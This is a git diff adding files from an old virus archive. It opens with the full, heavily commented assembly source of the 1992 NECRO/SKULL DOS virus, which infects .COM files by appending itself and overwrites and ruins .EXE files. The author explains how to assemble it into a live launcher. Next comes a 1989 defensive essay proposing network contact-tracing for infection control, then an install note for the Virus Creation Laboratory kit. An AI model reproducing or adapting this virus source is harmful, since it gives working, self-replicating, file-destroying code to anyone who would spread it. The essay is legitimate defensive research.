+;          ++===================================================++
+;          ||           NECRO (A.K.A. 'SKULL' virus)            ||
+;          ||           The 666 byte Dual Replicator            ||
+;          ||     DEC 1992 by Primal Fury, Lehigh Valley, PA    ||
+;          ++===================================================++
+;                   -=Prepared for Crypt Newsletter 11=-
+;
+; Here's a virus that's actually two viruses in one.  The main virus is a
+; a direct action, appending .COM infector.  It will search the system path
+; for .COMs to infect, and may infect files on the path in preference to 
+; to those in the current directory (if no path is set, it stays in the
+; current directory).  Roughly one out of every eight infections (on a ran-
+; dom basis) will be non-standard.  In these infections, NECRO will toggle to 
+; an overwriting .EXE infector.  
+;   
+;  
+; This .EXE infector is composed of much of the same code as the 
+; COM infector -- the virus alternates between the two modes of infection 
+; using a 'master switch' which is hooked up to a simple randomization 
+; engine.  The master switch, when thrown, trips a series of auxilliary
+; switches which alter the virus' behavior.  This saves on bytes and is 
+; therefore much better than having the virus drop an entirely independent
+; .EXE overwriter.  I hope to expand upon this 'self-programming' concept
+; in future viruses.
+  
+; Infected .COM's should function as intended after the viral code appended to 
+; them has finished doing its thing. But infected .EXE's are ruined.  These 
+; (provided they are under about 64K in length) will, when executed, pass 
+; their illness on to the next uninfected .EXE within the current directory, 
+; displaying the following graphic & message:
+
+;   ������������           
+; �����۲��������        
+;�۲��������������   You cant execute this file:         
+;�����۲�����   �    Its already dead!           
+; �����۲��������          
+;  ���۲�߲�����           
+;   ���۲��޲����          
+;           �����              
+ 
+; SKULL will then return the baffled user to the DOS prompt. I leave it to  
+; your imagination to picture the consternation on the novice's face 
+; as he tries to isolate the source of this overwriting infection which 
+; seems to pop up again and again in different directories.  A very 
+; observant user may notice a file length increase of exactly 666 bytes in 
+; infected .COM's.  Infected .EXE's will not increase in length unless they  
+; are less than ~200 bytes to begin with.  Note that overwritten .EXE's larger  
+; than 64K will fail to load and will be non-infectious. Like Popoolar 
+; Science, the virus renders these programs into a .COM-like in structure. 
+; DOS will NOT execute these files.  In any case, the programs are ruined  
+; by SKULL.  As of this release, NECRO avoids files that are read-only or 
+; hidden, so these files are be safe from the virus (for now...)
+  
+; CREDITS:  DARK ANGEL   --  for his COM infector replicatory code. (D.A.)  
+;           NOWHERE MAN  --  for his VCL 1.0's path-searching routine. (N.M.)
+;           
+;  
+; Except where noted, I have commented the code with the novice 
+; programmer in mind.  In the places so noted, D.A.'s and N.M.'s com-
+; ments, supplied from VCL 1.0 and PS-MPC assembly libraries, have been 
+; left intact.
+
+; To assemble, use Isaacson's A86 to generate a .COMfile directly from
+; this listing.  You will have a live NECRO launcher. MASM/TASM
+; compatible assemblers will require the addition of a declarative pair.
+;
+; Partial viral signature suitable for loading into TBScan's VIRSCAN.DAT,
+; SCAN, or F-PROT 2.0x:
+; [Necro]
+; A9 01 00 74 29 E8 6A 00 8C C8 8E D8 8E C0 32 C0  
+
+  
+  Start:  db      0e9h     ; jump to find_start
+          dw      0
+  Find_start:  call    next              ;common technique to allow virus to
+  next:   pop     bp                     ;find its own code.  On exit, bp
+          sub     bp, offset next        ;points to start of code.
+          lea     si, [bp+offset stuff]  ;Prepare to restore orig. 3 bytes.
+          mov     di, 100h               ;push 100h, where all COMs start in
+          push    di                     ;memory, & where control will be
+                                         ;returned to host file.
+          movsw                          ;restore the 3 bytes formerly relo-
+          movsb                          ;cated by the virus upon infection.
+          mov     di,bp                  ;point DI to start of virus.
+          lea     dx, [bp+offset dta]    ;set new Disk Transfer Address, so
+          call    set_dta                ;virus won't fuck up original.
+          call    search_files           ;call path-search/infection routine.
+          jmp     quit                   ;when done, return control to 
+                                         ;host file.
+          
+  ;Nowhere Man's VCL 1.0 path search routine, slightly modified for 
+  ;compatibility with Dark Angel's code, and with 'master infection-mode 
+  ;switch' added.  N.M.'s original comments have been retained for your 
+  ;enlightenment.    
+
+search_files:
+          mov     bx,di                   ; BX points to the virus
+          push    bp                      ; Save BP
+          mov     byte ptr [bp+offset pathstore],'\'  ;Start with a backslash
+          mov     ah,047h                 ; DOS get current dir function
+          xor     dl,dl                   ; DL holds drive # (current)
+          lea     si,[bp+offset pathstore+1] ; SI points to 64-byte buffer
+          int     021h
+          call    traverse_path           ; Start the traversal
+
+traversal_loop: 
+          cmp     word ptr [bx + path_ad],0     ; Was the search unsuccessful?
+          je      done_searching          ; If so then we're done
+          call    found_subdir            ; Otherwise copy the subdirectory
+          mov     ax,cs                   ; AX holds the code segment
+          mov     ds,ax                   ; Set the data and extra
+          mov     es,ax                   ; segments to the code segment
+          xor     al,al                   ; Zero AL
+          stosb                           ; NULL-terminate the directory
+          mov     ah,03Bh                 ; DOS change directory function
+          lea     dx,[bp+offset pathstore+65] ; DX points to the directory
+          int     021h
+                                                                    
+          ;The Master Switch, tied whimsically to the system clock:
+
+          mov     ah,2ch                  ;DOS get system time.                      
+          int     21h                     ;        
+          cmp     dl,13                   ;is 1/100th second > 13?
+          jg      call_infector           ;if so, stay in COM infector
+                                          ;mode (the default).
+          mov     si,3                    ;throw switch for EXE infect.
+
+          ;back to Nowhere Man's code:
+
+call_infector:  
+          push    di
+          call    find_files              ; Try to infect a file.
+          pop     di
+          jnc     done_searching          ; If successful, exit
+          jmp     short traversal_loop    ; Keep checking the PATH
+
+done_searching: 
+          mov     ah,03Bh                 ; DOS change directory function
+          lea     dx,[bp+offset pathstore]   ; DX points to old directory
+          int     021h
+          cmp     word ptr [bx + path_ad],0  ; Did we run out of directories?
+          jne     at_least_tried          ; If not, exit
+          stc                             ; Set carry flag for failure
+
+at_least_tried: 
+          pop     bp                      ; Restore BP
+          ret                             ; Return to caller
+
+com_mask        db      "*.COM",0               ; Mask for all .COM files
+
+
+traverse_path:   
+          mov     es,word ptr cs:[002Ch]  ; ES holds the enviroment segment
+          xor     di,di                   ; DI holds the starting offset
+
+find_path:      
+          lea     si,[bx + ath_string]    ; SI points to "PATH="
+          lodsb                           ; Load the "P" into AL
+          mov     cx,08000h               ; Check the first 32767 bytes
+          repne   scasb                   ; Search until the byte is found
+          mov     cx,4                    ; Check the next four bytes
+
+check_next_4:   
+          lodsb                           ; Load the next letter of "PATH="
+          scasb                           ; Compare it to the environment
+          jne     find_path               ; If there not equal try again
+          loop    check_next_4            ; Otherwise keep checking
+
+          mov     word ptr [bx + path_ad],di      ; Save the PATH address
+          mov     word ptr [bx + path_ad + 2],es  ; Save the PATH's segment
+          ret                             ; Return to caller
+
+ath_string      db      "PATH="           ; The PATH string to search for
+path_ad         dd      ?                 ; Holds the PATH's address
+
+found_subdir:    
+          lds     si,dword ptr [bx + path_ad]     ; DS:SI points to PATH
+          lea     di,[bp+offset pathstore+65] ; DI points to the work buffer
+          push    cs                      ; Transfer CS into ES for
+          pop     es                      ; byte transfer
+
+move_subdir:    
+          lodsb                           ; Load the next byte into AL
+          cmp     al,';'                  ; Have we reached a separator?
+          je      moved_one               ; If so we're done copying
+          or      al,al                   ; Are we finished with the PATH?
+          je      moved_last_one          ; If so get out of here
+          stosb                           ; Store the byte at ES:DI
+          jmp     short move_subdir       ; Keep transfering characters
+
+moved_last_one: 
+          xor     si,si                   ; Zero SI to signal completion
+
+moved_one:      
+          mov     word ptr es:[bx + path_ad],si ; Store SI in the path address
+          ret                             ; Return to caller
+
+
+
+  ;O.K. -- Now here's an important 'architectural' point:  The following 
+  ;code (down to the next inset) will never be executed within the COM 
+  ;appender (that viral code jumps over it).  It will, however be the first 
+  ;thing executed within overwritten EXE files.  Why?  Because in EXE infec-
+  ;tion mode, everything from EXFECT on down (but nothing previous) is 
+  ;written over the beginning of the EXE host file.
+
+  exfect:       call    next_two            ;Here again we see the old trick
+                                            ;for pointing BP to start of  
+  next_two:     pop     bp                  ;viral code.  (possibly should
+                sub     bp, offset next_two ;have been subroutined [?]).
+                mov     si,3                ;throw master switch for EXE    
+                                            ;infection, so infection code
+                                            ;below knows to use that mode!
+                lea     dx,[bp+offset dta]  ;set DTA:  This would normally     
+                call    set_dta             ;be utterly ridiculous (!) in an
+                                            ;overwriting virus but is used
+                                            ;here to maintain compatibility
+                                            ;with the infection code.      
+                call    find_files          ;try to infect another EXE.
+                jmp     prequit             ;display message & quit to DOS.
+
+  ;Now we're back to Dark Angel's code, expanded to save & restore file 
+  ;date/time-stamp, and of course to accomodate the new EXE overwriting code 
+  ;and infection-mode 'switching system'.  This is where infection actually 
+  ;takes place.
+
+  find_files:   
+          
+          push    bp                ;for compatibility with path-search.         
+          mov     ah, 4eh           ;phunction phor phinding phirst phile 
+                                    ;that phits phile-mask.
+  tryanother:
+          lea     dx, [bx+com_mask] ;by default, look for a .COM extension. 
+          cmp     si, 3             ;is the EXE infector switch thrown?
+          jne     short look        ;if not go on, else qeue up '*.EXE' mask
+          lea     dx, [bp+exemask]  ;in place of '*.COM'.  
+
+  look:    
+          xor     cx, cx            ;attribute mask - find only normal
+          int     21h               ;attributes.
+          jnc     open_file         ;Have we run out of candidates in this
+          pop     bp                ;directory?  If not go on, else return.
+          ret                       ;note: a candidate file matches the file
+                                    ;mask & has normal attributes.
+  open_file:
+          mov     ax, 3D02h              ;DOS open file function.
+          lea     dx, [bp+offset dta+30] ;get file name out of DTA (put there
+                                         ;for us by the 4eh or 4fh function).
+          int     21h
+          xchg    ax, bx
+          mov     ah, 3fh             ;read the first 3 bytes of file & put
+          lea     dx, [bp+stuff]      ;them in 'stuff' buffer, where we can
+          mov     cx, 3               ;inspect them for previous infection.
+          int     21h
+          cmp     si,3                ;is the EXE infector switch thrown?
+          jne     short comcheck      ;if not, use the COM file checker.
+          mov     di,dx               ;otherwise, check EXE for infection.
+          cmp     byte ptr [di], 4dh  ;is the first byte of the EXE an 'M'?
+          jne     short searchloop    ;no? then already fucked. Keep looking.
+          jmp     infect_file         ;otherwise let's infect it.
+
+  comcheck:                                      ;DARK ANGEL'S COMMENTS: 
+          mov     ax, word ptr [bp+dta+26]       ;"ax = filesize
+          mov     cx, word ptr [bp+stuff+1]      ;jmp location
+          add     cx, eov - find_start + 3       ;convert to filesize
+          cmp     ax, cx                         ;if same, already infected
+          jnz     short infect_file              ;so quit out of here"
+          
+  searchloop:                          
+          call    close               ;close the file.
+          mov     ah, 4fh             ;DOS 'find next file' function.
+          jmp     short tryanother    ;go back up & try to find new victim.
+
+  infect_file:
+          mov     cx, word ptr [bp+dta+22]       ;Read file date & time
+          mov     dx, word ptr [bp+dta+24]       ;stamps from DTA & store
+          push    cx                             ;them for retrieval after
+          push    dx                             ;infection is complete.
+          cmp     si, 3                          ;branch if this is to be
+          jne     short comfect                  ;a COM infection.  other-
+                                                 ;wise, we now replicate the
+                                                 ;EXE overwriting virus.
+          xor     al, al                         ;go to the beginning of
+          call    f_ptr                          ;the file.
+          mov     ah, 40h                        ;write to file function.
+          mov     cx, eov - exfect               ;write EXFECT through EOV   
+          lea     dx, [bp+exfect]                ;to the EXE file.  [another 
+          int     21h                            ;EXE is now our slave.]
+          jmp     short finishfect               ;now, finish up.
+                                               
+  comfect:                                       ;COM infection routine.             
+                                                 ;SAYETH DARK ANGEL:
+                                          ;"Calculate the offset of the jmp.
+          sub     ax, 3                          ;ax = filesize - 3"
+          mov     word ptr [bp+writebuffer], ax  ;store jump offset in buffer.
+          xor     al, al                         ;null AL (write will start
+          call    f_ptr                          ;at byte 0 of file.  move
+                                                 ;file pointer there).    
+          mov     ah, 40h                        ;write to file function.
+          mov     cx, 3                          ;we'll write 3 bytes, namely
+          lea     dx, [bp+e9]                    ;the contents of E9 buffer.
+          int     21h                            ;victim file now begins with
+                                                 ;a jump to the viral code!
+          mov     al, 2                          ;now move file pointer to
+          call    f_ptr                          ;the end of the victim file.
+          mov     ah, 40h                        ;write to file again.
+          mov     cx, eov - find_start           ;Namely, write the main
+          lea     dx, [bp+find_start]            ;viral code.
+          int     21h                            ;virus is now appended to
+                                                 ;the file.
+  finishfect:                                    ;now to clean up a little.
+          pop     dx                             ;get old file date/time-
+          pop     cx                             ;stamp off of stack.
+          mov     ax, 5701h                      ;DOS set file date/time
+          int     21h                            ;stamp. (Otherwise, they
+                                                 ;would be left set to date
+                                                 ;& time of infection).
+          pop     bp                             ;path-searcher will want 
+                                                 ;it's old bit pointer back.
+  close:
+          mov     ah, 3eh                        ;DOS close file function.
+          int     21h
+          ret                                    ;return to CALL_INFECTOR.
+
+                                               ;end of infection routine.
+          
+  primal          db     "�����Ͻ���������������"     ;an encrypted text            
+          ;string, mainly here to pad appended virus length out to 666 
+          ;bytes.  'Tight Code' purists will shit a brick over this.                 
+
+  ;the COM infector never uses the PREQUIT routine below.  Only the EXFECT 
+  ;routine (which is only used by the EXE overwriting virus, for reasons ex-
+  ;plained in the inset above EXFECT) jumps to it.  It's the EXE infector's 
+  ;message payload.  PREQUIT uses a simple encryption/decryption mechanism 
+  ;to keep the message hidden from file viewers & such.  It may have been 
+  ;better (albeit a bit costlier in speed & bytes) to encrypt the entire 
+  ;virus (preferably, with polymorphic capabilities tossed in).  I hope to 
+  ;make this mod in my next variant.  But for now, trojan programmers might 
+  ;find this routine of interest:
+
+  prequit:                          
+           lea    si,[bp+offset msg]  ;queue up message to be displayed.
+           mov    cx,204              ;CX holds length of message.
+  
+  xorloop:                            ;loop will decrypt & display message.
+           lodsb                      ;load next byte of message into AL.
+           xor    al,128              ;XOR the byte by our key.
+           mov    ah,0eh              ;BIOS 'teletype' write to screen (the
+           int    10h                 ;the character is already in AL).
+           loop   xorloop             ;loop until CX's # of bytes processed.
+           mov    ax,4c00h            ;exit to DOS function, will return   
+           int    21h                 ;user to DOS prompt.
+
+; Here's the encrypted version of our 'can't execute' message.  Note that
+; this odd byte pattern may look suspicious to someone in the know using a
+; file viewer, but then, so would the unencrypted file_masks and "PATH="!
+
+  msg      db      "������\\[[[[[[[[\\����\[[[[[2[[[[[[[[���^[2[[[[[[[["
+           db      "[[[[[]��������������������������庍��^[[[[[22[[[_"
+           db      "���[������������������䡍���[[[[[[22[[\\\[_�����[["
+           db      "[[22_2[[[[]������__[[22\^2[[[]��������������22]]]��"
+
+; D.A. SAYS: "Restore the DTA and return control to the original program
+  quit:   mov     dx, 80h             ;Restore current DTA to
+                                      ;the default @ PSP:80h
+  set_dta:
+          mov     ah, 1ah             ;Set disk transfer address"
+          int     21h                 ;so, let it be written,              
+          ret                        ;so, let it be done.
+
+  f_ptr:  mov     ah, 42h             ;DOS move file pointer
+          xor     cx, cx              ;DARK ANGEL:       
+          cwd                         ;"equivalent to: xor dx, dx"
+          int     21h
+          ret
+                           
+  exemask  db      "*.EXE",0          ;file-mask for EXEs.
+  
+  ; All commentary from here down is the DARKANGELMEISTER's.  Hope you found
+  ; the code useful and/or informative.  P.F. signing off...       
+                       
+  ; Original three bytes of the infected file
+  ; Currently holds a INT 20h instruction and a null byte 
+  stuff   db      0cdh, 20h, 0
+  e9      db      0e9h
+  eov equ $                                      ; End of the virus
+  ; The following variables are stored in the heap space (the area between
+  ; the stack and the code) and are not part of the virus that is written
+  ; to files.
+  writebuffer dw  ?                              ; Scratch area holding the
+                                                 ; JMP offset
+  dta         db 42 dup (?)
+  pathstore   db 135 dup (?)
diff --git a/textfiles.com/virus/net.hor b/textfiles.com/virus/net.hor
new file mode 100644
index 00000000..b0cc7ca8
--- /dev/null
+++ b/textfiles.com/virus/net.hor
@@ -0,0 +1,378 @@
+Date: Thu, 16 Mar 89 20:56:18 +0100
+From: David Stodolsky <stodol@diku.dk>
+
+Net Hormones: Part 1 - 
+Infection Control assuming Cooperation among Computers
+
+Copyright (c) 1989 David S. Stodolsky, PhD. All rights reserved.
+
+1.   Abstract
+
+A new type of infection control mechanism based upon contact tracing is 
+introduced. Detection of an infectious agent triggers an alerting 
+response that propagates through an affected network. A result of the 
+alert is containment of the infectious agent as all hosts at risk 
+respond automatically to restrict further transmission of the agent. 
+Individually specified diagnostic and treatment methods are then 
+activated to identify and destroy the infective agent. The title "Net 
+Hormones" was chosen to indicate the systemic nature of this programmed 
+response to infection.
+
+2.   Introduction
+
+A new type of infection control mechanism that is based upon network-
+wide communication and that depends upon cooperation among computer 
+systems is presented. Neither diagnosis nor treatment is necessary for 
+the operation of the mechanism. The mechanism can automatically trigger 
+responses leading to effective containment of an infection. The 
+identification and destruction of the infectious agent is determined by 
+individual actions or programs. This permits a highly desirable 
+heterogeneity in diagnostic and treatment methods.
+
+Definition: "Hormone . . . 1: a product of living cells that circulate 
+in body fluids or sap and produces a specific effect on the activity of 
+cells remote from its point of origin; especially one exerting a 
+stimulatory effect on a cellular activity. 2: a synthetic substance 
+that acts like a hormone (Webster's new collegiate dictionary, 1976)." 
+The analogy here is between each network node or computer system and 
+the cell. In biological systems hormones attach to specialized 
+receptors on the cell surface resulting in cell activation. In the 
+system described here, a match between a code in a system archive and a 
+code delivered as part of an alerting message results in activation. 
+Alerting messages circulated electronically serve the role of hormones. 
+
+Epidemiology has traditionally had three major approaches to the 
+control of infectious agents:
+
+:1 - Treatment of the sick (e. g., penicillin)
+
+:2 - Contact tracing (e. g., social-work notification programs, laws 
+forcing the reporting of certain diseases and of contacts of infected 
+persons)
+
+:3 - Prevention (e. g., vaccination, public information campaigns)
+
+In computer system terms:
+
+:1 - Treatment of infections (e. g., various programs and manually 
+installed patches and fixes)
+
+:2 - Contact tracing (e. g., software "recall", and other manual 
+operations)
+
+:3 - Prevention (e. g., various programs for blocking virus 
+replication, alerting users, and for logging suspicious events)
+
+Contact tracing has been neglected with computer systems, although it 
+could be argued it is much easier with computer systems than with 
+biological systems. Currently such tracing depends upon people reading 
+reports and determining if their system is subject to infection, 
+performing diagnostic tests, determining a treatment method, obtaining 
+software, and so on. This is chancy and time consuming, requiring most 
+often people with the highest level of expertise. As computers and 
+networks speed up, an infectious agent could spread through a network 
+in hours or minutes. "Once a virus has infected a large number of 
+computers on a network, the number of infected removable media elements 
+will begin to skyrocket. Eventually, if the virus continues to go 
+undetected, a stage is reached in which the probability of identifying 
+and recovering all of the infected media is virtually zero (McAfee, 
+1989)." An automated contact tracing system thus seems essential in the 
+future if infectious agents are to be controlled.
+
+3.   Threats
+
+"The modification of an existing virus to incorporate a long term delay
+(such as 6 months or even a year) coupled with a totally destructive
+manipulation task (such as a FAT, Boot sector scribble followed by a
+complete format) is a fairly simple task. Such an action would convert
+even a crude virus strain such as the Lehigh 1 virus into a
+devistating (sic) strain. (Eg the comment by Ken that the modified 
+version of the Lehigh virus is now far more dangerous due to 
+modification of the delay in activation of its manipulation task) 
+(Ferbrache, 1989)."
+
+Scott (1989) requested comments on:
+ 
+"A little future speculation here... currently we seem to be fighting a
+losing battle against virus detection and as viruses improve it's
+unlikely that that will change.  If we want the capability to download
+shareware, etc, from bulletin boards, etc, then we must assume that we
+cannot check the software for a virus with 100% success before running
+it.  In general, you can't know the output of a program given the
+input without running it, except in special cases.
+ 
+We can check for *known* viruses; but how long before shape-changing
+and mutating viruses hit the scene that defeat all practical
+recognition techniques?"
+
+An inapparent infection could spread rapidly, with damage noted only 
+much later. Consider a worm that is constructed to carry a virus. The 
+worm infects a system, installs the virus and then infects other nearby 
+systems on the net. Finally, it terminates erasing evidence of its 
+existence on the first system. The virus is also inapparent, it waits 
+for the right moment writes some bits and then terminates destroying 
+evidence of its existence. Later the worm retraces its path reads some 
+bits, then writes some bits and exits. The point is that an inapparent 
+infection could spread quite widely before it was noticed. It also 
+might be so hard to determine whether a system was infected or not, 
+that it would not be done until damage was either immanent or apparent. 
+This analysis suggests response to network-wide problems would best be 
+on a network level. 
+
+4.   Theory of operation
+
+Computers generate (in the simplest case) random numbers which are used 
+to label transactions. A transaction is defined as an interaction 
+capable of transmitting an infectious agent. After each transaction 
+both systems therefore have a unique label or code for that 
+transaction. In the event that a system is identified as infected, the 
+transaction codes which could represent transactions during which the 
+agent was transmitted are broadcast to all other computers. If a 
+receiving computer has a matching code, then that system is alerted to 
+the possibility of the agent's presence, and can broadcast transaction 
+codes accumulated after the suspect contact. This iterates the process, 
+thus identifying all carriers eventually. The effect is to model the 
+epidemiological process, thereby identifying all carriers through 
+forward and backward transaction tracking (Stodolsky, 1979a; 1979b; 
+1979c; 1983; 1986). 
+
+5.   The process of infection control
+
+The process can be broken down into routine and alerting operations. 
+During routine operations, each file transfer is labeled in a way that 
+does not identify the systems involved. These labels are time stamped 
+(or have time stamps encoded in them). They are written into archives 
+on each system, ideally write-once/read-many times devices or some 
+other type of storage that could not easily be altered. 
+
+Alerting procedures are invoked when an infectious agent is noted or 
+when a suspect transaction code is received that matches one in the 
+system's archive. The earliest time the agent could have arrived at the 
+system and latest time (usually the moment the agent is noted or a 
+received suspect transaction code is matched) it could have been 
+transmitted from the system are used to delimit suspect transaction 
+codes. These codes are broadcast to alert other systems to the 
+potential presence of the agent.
+
+In the simplest and most common case, if a system gets an alert that 
+indicates, "You could have been infected at time one," then the system 
+automatically packages the transaction codes between time one and the 
+present time to generate a new alert indicating the same thing to other 
+systems with which it has had contact. 
+
+Another automatic response could be to immediately cut off 
+communications in progress, thus reducing the risk of infection. A 
+further benefit of such a reaction would be the possibility of 
+disrupting the transfer of an infectious agent. Such a disrupted agent 
+would be harmless and easily identified and evaluated. Reestablishment 
+of communication could occur immediately with new procedures in force 
+that could warn new users that an alert was in progress as well as 
+limiting the type of transfers that could take place.
+
+5.1.   Practical considerations
+
+Direct identification, as opposed to identification through forward 
+tracing notification, does not delimit effectively the earliest time 
+that an agent could have been present on a system. Thus an alert from 
+an originating system could include all transaction codes written prior 
+to the identification (or some default value). This could generate 
+excessive reaction on the network. This reaction could be controlled if 
+another system in a later alert indicated it had originated the 
+infection on the system originating the alert. Thus, protection of 
+identity which reduces any inhibition about reporting infection is 
+important. The type of reaction discussed here might be called a panic 
+reaction, because an excessive number of systems might be notified of 
+potential infection in the first instance. 
+
+A more restricted response could be generated if persons at the alert 
+originating system analyzed the causative agent, thereby hopefully 
+establishing the earliest time the agent could have been present on 
+that system. In this case, the suspect transactions could be delimited 
+effectively and all systems that could have been infected would be 
+notified, as would the system that had transmitted the agent to the 
+system originating the alert (assuming one exists). Ideally, each 
+notified system would be able to determine if it had received or 
+originated the infection and respond accordingly. 
+
+5.2.   Forward tracing assumption
+
+Assume, however, that rapid response is desired. Each notified system 
+would then react as if it had been notified of an infection transmitted 
+to it. It would package the transaction codes that had been written 
+later than the suspect transaction code it had received and issue a 
+secondary alert. This forward tracing assumption would lead to quite 
+effective control because of the exponential growth in the number of 
+infected hosts in epidemics (and exponential growth of alerts resulting 
+>From forward tracing). That is, a system can infect many others as a 
+result of a single infective agent transmitted to it. Forward tracing 
+would alert all systems that the alerting system could have infected. 
+These newly alerted systems would also issue forward trace alerts, and 
+this would continue until containment was reached under the forward 
+tracing assumption.
+
+5.3.   Backward tracing of suspect contacts and diagnosis
+
+As a result of this rapid forward tracing response, it is likely that 
+more active infections would be identified. The resulting new 
+information could be used to more effectively characterize the life 
+cycle of the agent, thereby hopefully permitting effectively delimited 
+backward tracing. Also as a result of accumulated information, positive 
+tests for the agent would become available. Once this stage had been 
+reached the focus of action could shift from control of suspect 
+transactions to control of transactions known to facilitate the 
+transmission of the agent.
+
+6.   Feasibility and Efficiency
+
+Both technical and social factors play a key role in the operation of 
+the control mechanism. Contact tracing is probably most effective for 
+sparsely interacting hosts. The rate of transfer of the infectious 
+agent as compared to the rate of transfer of the suspect transaction 
+codes is also a critical factor. Recording of transactions can be 
+comprehensive on computer networks, however, unregistered transactions 
+will be a factor in most cases. Once the infectious agent has been 
+identified, the type of transactions capable of transmitting the agent 
+can be delimited. This could increase efficiency. 
+
+6.1.   Social organization of alerts
+
+Another major efficiency factor is errors in origination of alerts. 
+Since protected messages would trigger network-wide alerts, it is 
+important that false alarms are controlled effectively. On the other 
+hand, failure to report an infection could permit an infectious agent 
+to spread in an uncontrolled manner and could increase the number of 
+systems unnecessarily alerted. Successful operation of the mechanism 
+described above assumes voluntary cooperation among affected systems. 
+This assumption could be relaxed by application of an enforcement 
+mechanism. It would require substantially greater complexity and 
+greater centralization of coordination. In other words, if cooperation 
+was not forthcoming "voluntarily", users would likely be treated to a 
+complicated, restrictive, and resource intensive mechanism that would 
+be developed to enforce it. "Estimates of the damages inflicted by 
+November's Internet infection alone ranged upward of $100 million . . . 
+(McAfee, 1989)." Costs of this magnitude make it very likely that even 
+expensive enforcement mechanisms will be developed if they are made 
+necessary.
+
+The simplest organizational strategy would assume that protection of 
+identity was not needed, but this would also be likely to inhibit 
+alerting. True anonymity, however, permits irresponsible behavior to go 
+unchecked. A reputation preserving anonymity (pseudonymity) would be 
+desirable to ensure both protection and accountability and thereby 
+promote cooperation. Pseudonyms would best be the property of persons 
+(in association with a computer system). 
+
+Even sincere cooperation, however, would not eliminate inefficiencies 
+resulting from false alarms or failure to alert. Both inadequate 
+training and poor judgement are likely sources of these errors. If 
+users realize that there are reputational costs associated with these 
+failures, then they are likely to be motivated to minimize them. False 
+alarms are already a major problem because of user inexperience and the 
+high level of defects in widely used software. A reputational mechanism 
+would motivate increased user education and more careful software 
+selection, with a corresponding pressure on software publishers to 
+produce well behaved and carefully documented products. 
+
+6.2.   Enforcing cooperation
+
+Crypto-protocols could be used to ensure that a non-cooperator could 
+not communicate freely with others using the infection control 
+mechanism. This type of communication limiting could be used routinely 
+to ensure that a system requesting connection was not infected. In 
+effect, systems would exchange health certificates before file 
+exchanges, to ensure that they would not be infected. A system that 
+could not show a health certificate could be rejected as a conversation 
+partner due to risk of infection. This would no doubt enforce 
+cooperation. The mechanism (Stodolsky, 1986) is beyond the scope of 
+this note.
+
+6.3.   Non-network transfers
+
+While the discussion above has focused on transfers through networks, 
+the same principles could be applied to disk or tape transfers. The 
+originating system would write a transaction code on the medium with 
+each file. Protection of identity would possibly be reduced under this 
+type of transfer. Since there is no question about the directionality 
+of transmission of an infectious agent in off-line transfers, non-
+network transmission is likely to be easier to control. Several other 
+factors, such as the rate of spread of the agent, are likely to make 
+such infections less troublesome. 
+
+7.   Summary and Benefits 
+
+The idea behind Net Hormones is to make immanent danger apparent. More 
+precisely Net Hormones permit the visualization of infection risk. 
+
+7.1.   Control of unidentified infectious agents.
+
+Net Hormones work by permitting isolation of infectious hosts from 
+those at risk. Identification of the infectious agent is not required 
+for action. Therefore, new and as yet unidentified agents can be 
+effectively controlled.
+
+7.2.   Rapid response
+
+Hosts could automatically respond to alerts by determining if they had 
+been involved in suspect contacts, and generate new alerts that would 
+propagate along the potential route of infection. 
+ 
+7.3.   Protection of identity
+
+The mechanism could function without releasing the identity of an 
+infected host. This could be crucial in the case an institution that 
+did not wish it to be publicly know that its security system had been 
+compromised, or in the case of use of unregistered software. More 
+precisely, software obtain by untraceable and anonymous file transfers 
+could be protected by this mechanism without release of users' 
+identity.
+
+7.4.   Distributed operation
+
+Operation is not dependent upon a centralized register or enforcement 
+mechanism. Some standardization would be helpful, however, and a way to 
+broadcast alerts to all potential hosts would be valuable.
+
+8.   References
+
+Ferbrache, David J. (1989, February 10). Wide area network worms. 
+VIRUS-L Digest, V. 2 : Issue 44. [<davidf@CS.HW.AC.UK> <Fri, 10 Feb 89 
+11:45:37 GMT>]
+
+McAfee, J. D. (1989, February 13). In depth: Managing the virus threat. 
+Computerworld, 89-91; 94-96.
+
+Scott, Peter. (1989, February 10). Virus detection. VIRUS-L Digest, V. 
+2 : Issue 44. [PJS%naif.JPL.NASA.GOV@Hamlet.Bitnet 
+<pjs@grouch.jpl.nasa.gov>. <Fri, 10 Feb 89 10:46:21 PST>]
+
+Stodolsky, D. (1979a, April 9). Personal computers for supporting 
+health behaviors. Stanford, CA: Department of Psychology, Stanford 
+University.  (Preliminary proposal)
+
+Stodolsky, D. (1979b, May 21). Social facilitation supporting health 
+behaviors. Stanford, CA: Department of Psychology, Stanford University. 
+(Preliminary proposal)
+
+Stodolsky, D. (1979c, October). Systems approach to the epidemiology 
+and control of sexually transmitted diseases. Louisville, KY: System 
+Science Institute, University of Louisville. (Preliminary project 
+proposal)
+
+Stodolsky, D. (1983, June 15). Health promotion with an advanced 
+information system. Presented at the Lake Tahoe Life Extension 
+Conference. (Summary)
+
+Stodolsky, D. (1986, June). Data security and the control of infectious 
+agents. (Abstracts of the cross disciplinary symposium at the 
+University of Linkoeping, Sweden: Department of Communication Studies). 
+
+Webster's new collegiate dictionary. (1976). Springfield, MA: G. & C. 
+Merriam
+
+-------------------------------------------------------------
+
+David Stodolsky                          diku.dk!stodol@uunet.UU.NET
+Department of Psychology                       Voice + 45 1 58 48 86
+Copenhagen Univ., Njalsg. 88                    Fax. + 45 1 54 32 11
+DK-2300 Copenhagen S, Denmark                         stodol@DIKU.DK
+
diff --git a/textfiles.com/virus/newinstl.txt b/textfiles.com/virus/newinstl.txt
new file mode 100644
index 00000000..b0a3cfdd
--- /dev/null
+++ b/textfiles.com/virus/newinstl.txt
@@ -0,0 +1,29 @@
+NOTE:  VCL.ZIP (Nowhere Man's Virus Creation Laboratory v1.00) IS REQUIRED
+TO INSTALL V.C.L.; THIS PROGRAM ALONE IS NOT SUFFICIENT.  PLEASE FOLLOW
+THE INSTRUCTIONS BELOW.
+
+
+New INSTALL for V.C.L.
+----------------------
+
+        This is the new installation program for Nowhere Man's Virus
+Creation Laboratory v1.0.  The original installation program had a bug
+that would cause a system hang whenever you tried to install V.C.L. to
+a disk other than the one that INSTALL.EXE exsisted upon.  This has been
+corrected, and a few other small improvements have been made.  If you 
+have the original .ZIP of V.C.L. v1.0 (you're a sysop, etc.), please 
+replace the INSTALL.EXE included in the package with this one (use 
+"PKZIP -k -a VCL.ZIP INSTALL.EXE").  Future versions of V.C.L. will be 
+shipped with this (or a better) installation program.
+        Before reinstalling V.C.L., use the DOS SETVER utility to set
+the apparent DOS version for V.C.L. to 3.30 ("SETVER VCL.EXE 3.30");
+ignore the ridiculous warning that SETVER will give you.  You must reboot 
+for the new SETVER entry to kick in.  Then run install...
